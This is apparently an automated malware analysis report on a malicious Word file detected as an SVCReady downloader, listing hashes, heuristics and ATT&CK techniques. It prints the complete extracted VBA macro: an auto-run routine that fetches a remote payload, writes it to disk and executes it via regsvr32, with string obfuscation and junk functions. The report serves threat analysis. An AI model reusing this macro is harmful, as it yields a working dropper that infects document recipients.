Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 5f5453bd65e861a7…

MALICIOUS

Office (OOXML)

113.9 KB Created: 2020-07-20 08:49:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-09-07
MD5: 31a934e364fb58a637e52b1ce0283639 SHA-1: 21ac908da34397e91cc4c095c9e631644bde5477 SHA-256: 5f5453bd65e861a7b879ad5c020157cf2473aa35bb90c12a998cd41cd23a8ff2
270 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a VBA macro that executes via the AutoOpen function. This macro utilizes WScript.Shell to execute a command. The script constructs a path that appears to be a file path for a second-stage payload, which is then executed. The presence of AutoOpen, Shell(), and WScript.Shell usage strongly indicates a downloader or dropper functionality.

Heuristics 8

  • ClamAV: Doc.Downloader.SVCReady-8f5af0a5f0da7070-9951542-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.SVCReady-8f5af0a5f0da7070-9951542-0
  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    d8d17ded a677e975(a0f97972), c2f5932e
Set d105f225 = CreateObject("wscript.shell")
Call d105f225.exec(c5f5d66e & " " & a677e975(a0f97972))
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    d8d17ded a677e975(a0f97972), c2f5932e
Set d105f225 = CreateObject("wscript.shell")
Call d105f225.exec(c5f5d66e & " " & a677e975(a0f97972))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    End Function
Sub AutoOpen()
Dim fc644ca1 As New fbd5255e
  • External relationship high OOXML_EXTERNAL_REL
    External target in word/_rels/document.xml.rels: file:///C:\Framework\rels\builds\pack1\us.jpg
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas OOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2014/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexOOXML external relationship
    • http://schemas.openxmlformats.org/markup-compatibility/2006OOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/inkOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2017/model3dOOXML external relationship
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsOOXML external relationship
    • http://schemas.openxmlformats.org/officeDocument/2006/mathOOXML external relationship
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingOOXML external relationship
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingOOXML external relationship
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainOOXML external relationship
    • http://schemas.microsoft.com/office/word/2010/wordmlOOXML external relationship
    • http://schemas.microsoft.com/office/word/2012/wordmlOOXML external relationship
    • http://schemas.microsoft.com/office/word/2018/wordml/cexOOXML external relationship
    • http://schemas.microsoft.com/office/word/2016/wordml/cidOOXML external relationship
    • http://schemas.microsoft.com/office/word/2018/wordmlOOXML external relationship
    • http://schemas.microsoft.com/office/word/2015/wordml/symexOOXML external relationship
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupOOXML external relationship
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkOOXML external relationship
    • http://schemas.microsoft.com/office/word/2006/wordmlOOXML external relationship
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeOOXML external relationship

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 4054 bytes
SHA-256: 9157d00b176c35b85630c1c6832db7a3d6da96f5e9cd8fbba2535575b062d141
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "b1bbf9c6"
Public Const a0f97972 As String = "cc:b\bp5r5o9gerda9m4d9a4t9a7\58f903408.4j6pdg5"
Function c2fac190()
c2fac190 = ActiveWindow.HorizontalPercentScrolled
End Function
Function af174683()
af174683 = ActiveWindow.DocumentMap
End Function
Function b97f0223()
b97f0223 = ActiveWindow.Creator
End Function
Sub AutoOpen()
Dim fc644ca1 As New fbd5255e
aaa = a677e975(d88bb23b)
c2f5932e = fc644ca1.ba436eea(aaa, "")
d8d17ded a677e975(a0f97972), c2f5932e
Set d105f225 = CreateObject("wscript.shell")
Call d105f225.exec(c5f5d66e & " " & a677e975(a0f97972))
End Sub

Attribute VB_Name = "c7b7450c"
Function d38b7a0b(ad27dc80 As Long) As Long
Dim a8c022cf As Long
For a8c022cf = 4 To 91
ad27dc80 = ad27dc80 - a8c022cf
Next a8c022cf
d38b7a0b = ad27dc80
End Function
Function c2f4a374()
c2f4a374 = Application.ActiveDocument.ConsecutiveHyphensLimit
End Function
Function b4ebd87d()
b4ebd87d = ActiveWindow.DocumentMap
End Function
Sub d8d17ded(d5bf097b, c35e3263)
Dim e718db10
e718db10 = FreeFile
Open d5bf097b For Output As #e718db10
Print #e718db10, fa6de948(c35e3263)
Close #e718db10
End Sub
Function f61e6d84(eea221bf, ac377da1)
f61e6d84 = Mid(eea221bf, ac377da1, 1)
End Function
Function a4181219()
a4181219 = ActiveWindow.View
End Function
Function f9feaf2f()
f9feaf2f = ActiveWindow.Visible
End Function
Function e27e7537()
e27e7537 = ActiveWindow.Creator
End Function
Function a677e975(c05d482e)
For ac377da1 = 1 To Len(c05d482e) Step 2
a3705320 = a3705320 & f61e6d84(c05d482e, ac377da1)
Next
a677e975 = a3705320
End Function
Function c269e38c()
c269e38c = Application.ActiveDocument.AutoSaveOn
End Function
Function ba99a350()
ba99a350 = 3059
End Function
Function ab6b7b40()
ab6b7b40 = Application.ActiveDocument.AttachedTemplate
End Function
Sub eddea078()
End Sub
Function fcd21d5a()
fcd21d5a = ActiveWindow.Creator
End Function
Function c6053011()
c6053011 = Application.ActiveDocument.ChartDataPointTrack
End Function
Function e40e6765()
e40e6765 = ActiveWindow.Creator
End Function
Function fa6de948(c35e3263)
fa6de948 = StrConv(c35e3263, 64)
End Function
Function ed0e8653()
ed0e8653 = ActiveWindow.HorizontalPercentScrolled
End Function
Function f578f5c3()
f578f5c3 = ActiveWindow.StyleAreaWidth
End Function
Function ab5aea35()
ab5aea35 = ActiveWindow.DisplayScreenTips
End Function
Function d88bb23b()
d88bb23b = ActiveDocument.Shapes(1).AlternativeText
End Function
Function e1f640ab()
e1f640ab = ActiveWindow.Index
End Function
Function f6dd9e68()
f6dd9e68 = ActiveWindow.Visible
End Function
Function d96fb546()
d96fb546 = Application.ActiveDocument.ConsecutiveHyphensLimit
End Function
Function c5f5d66e()
c5f5d66e = a677e975("r3e8g0s7vdr03c2e")
End Function

Attribute VB_Name = "fbd5255e"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function d9bc0a15()
d9bc0a15 = ActiveWindow.DisplayRulers
End Function
Function b46c717e()
b46c717e = ActiveWindow.Index
End Function
Function fb2c9891()
fb2c9891 = ActiveWindow.Left
End Function
Function ba436eea(e8820aad, b8ee83e6)
Dim c005e001 As Object
Set c005e001 = New MSXML2.XMLHTTP60
Call c005e001.Open("GET", e8820aad, False)
c005e001.Send
ba436eea = c005e001.responsebody
End Function
Function c9f77080()
c9f77080 = 178
End Function
Function c87feaec()
c87feaec = ActiveWindow.Parent
End Function
Function bb710c36()
bb710c36 = Application.ActiveDocument.ActiveWindow
End Function
Function e353d219(af1fdb52)
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 26112 bytes
SHA-256: e74b81dfd12fed5ba6c614811e9b10e8d17b834f5aa7cb2596c2a0b8fa645fcb

Open this report in the interactive analyzer, or submit your own file for analysis.